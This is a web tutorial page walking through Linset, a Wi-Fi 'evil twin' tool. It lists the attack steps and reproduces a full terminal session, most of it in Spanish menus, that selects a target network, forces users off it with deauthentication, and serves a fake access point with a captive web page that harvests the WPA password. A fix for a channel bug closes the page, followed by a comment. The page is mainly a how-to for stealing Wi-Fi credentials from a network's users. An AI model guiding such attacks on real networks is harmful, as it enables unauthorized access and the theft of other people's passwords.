Linset

Description

Linset – L inset I s N ot  S ocial E nginering T ool

How it works

  • Scan the networks.

  • Select network.

  • Capture handshake (can be used without handshake)

  • We choose one of several web interfaces tailored for me (thanks to the collaboration of the users)

  • Mounts one FakeAP imitating the original

  • A DHCP server is created on FakeAP

  • It creates a DNS server to redirect all requests to the Host

  • The web server with the selected interface is launched

  • The mechanism is launched to check the validity of the passwords that will be introduced

  • It deauthentificate all users of the network, hoping to connect to FakeAP and enter the password.

  • The attack will stop after the correct password checking

Example

Start Linset :

cyborg@cyborg:~$ sudo linset



#########################################################
#                                                       #
#		 LINSET 0.14 by vk496                   #
#	Linset Is Not a Social Enginering Tool          #
#                                                       #
#########################################################


Aircrack-ng.....OK!
Aireplay-ng.....OK!
Airmon-ng.......OK!
Airodump-ng.....OK!
Awk.............OK!
Curl............OK!
Dhcpd...........OK!
Hostapd.........OK!
Iwconfig........OK!
Lighttpd........OK!
Macchanger......OK!
Mdk3............OK!
Nmap............OK!
Php5-cgi........OK!
Pyrit...........OK!
Python..........OK!
Unzip...........OK!
Xterm...........OK!


                       _    _ _   _  ____  _____ _______
                      | |  | | \ | |/ ___\/  ___|__   __|
                      | |  | |  \| | |___ | |___   | |
                      | |  | | .   |\___ \|  ___|  | |
                      | |__| | |\  |____| | |___   | |
                      |____|_|_| \_|\____/\_____|  |_|


            _       ______  ___    __ ___      __  __           __
           | |     / / __ \/   |  / /|__ \    / / / /___ ______/ /__
           | | /| / / /_/ / /| | / / __/ /   / /_/ / __  / ___/ //_/
           | |/ |/ / ____/ ___ |/ / / __/   / __  / /_/ / /__/ ,<
           |__/|__/_/   /_/  |_/_/ /____/  /_/ /_/\__,_/\___/_/|_|


                     LINSET 0.14 (rev. 38) by  vk496
                        Para seguridadwireless.net 
                              Latest rev. [?] 

Select Interface :

Autodetectando Resolución...
1360x768

Selecciona una interface:

1) wlan0		RTL8187 	rtl8187 
#? 1

Select Single of Multiple Channel Scan (Airodump-NG) :

SELECCIONA CANAL
                                       
      1) Todos los canales             
      2) Canal(es) específico(s)       
                                       
      #> 2

Select Solo Channel , Range or Between Multiple Channels ( 1,2,5-7,11):

 Selecciona Canal de busqueda     
                                       
     Un solo canal     6               
     rango de canales  1-5             
     Multiples canales 1,2,5-7,11      
                                       
      #> 1

Press Ctrl + C when scanning for Available Network Done , Select Desired AP :

 #      MAC                      CHAN    SECU     PWR    ESSID

 1)*	10:FE:ED:B7:A5:42	 1	 WPA2	  73%	 tempztrela

(*) Red con Clientes

        Selecciona Objetivo               
      #> 1

Select Password Verification method :

METODO DE VERIFICACIÓN DE PASS
                                       
      1) Handshake (Recomendado)
      2) wpa_supplicant (Menos efectivo / Mas fallos)
      3) Atras
                                       
      #> 1

Path to save packets cap file :

INFO AP OBJETIVO

                     SSID = tempztrela / WPA2
                    Canal = 1
                Velocidad = 54 Mbps
               MAC del AP = 10:FE:ED:B7:A5:42 (TP-LINK TECHNOLOGIES CO., LTD.)


Introduzca la ruta del handshake que desea auditar (Ej: /root/micaptura.cap)
Pulsar ENTER para omitir

ruta:

Program to capture Handshake :

TIPO DE COMPROBACION DEL HANDSHAKE
                                       
      1) aircrack-ng (Posibilidades de fallo)
      2) pyrit
      3) Atras
                                       
      #> 1

Capture Handshake by Different DeAuth Method :

CAPTURAR HANDSHAKE DEL CLIENTE
                                       
      1) Realizar desaut. masiva al AP objetivo
      2) Realizar desaut. masiva al AP (mdk3)
      3) Realizar desaut. especifica al AP objetivo
      4) Volver a escanear las redes
      5) Salir
                                       
      #> 3

Press one if Handshake Captured :

¿SE CAPTURÓ el HANDSHAKE?

Estado del handshake: Sin handshake

      1) Si
      2) No (lanzar ataque de nuevo)
      3) No (seleccionar otro ataque)
      4) Seleccionar otra red
      5) Salir
 
      #> 1

Select Web Interface :

SELECCIONA LA INTERFACE WEB

1) Interface web neutra
2) Salir

#? 1

Select Language :

SELECCIONA IDIOMA

1) English     [ENG]
2) Spanish     [ESP]
3) Italy       [IT]
4) French      [FR]
5) Portuguese  [POR]
6) Atras

#? 1

When victim Connect to Evil Twin of Fake AP and enter password , Linset with the help of AirCrack-NG will trace it . 

Negative Fixed Channel :

Add –ignore-negative-one after airodump and aireplay command , To do this Edit /usr/bin/linset :

cyborg@cyborg:~$ sudo gedit /usr/bin/linset

Add –ignore-negative-one  after $WIFI_MONITOR in line number 957 and 964. 

2 Comments
  1. Profile photo of guirebadm
    guirebadm 2 years ago

    I tryed to fix the negative channel by editing the script but it did not work.

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?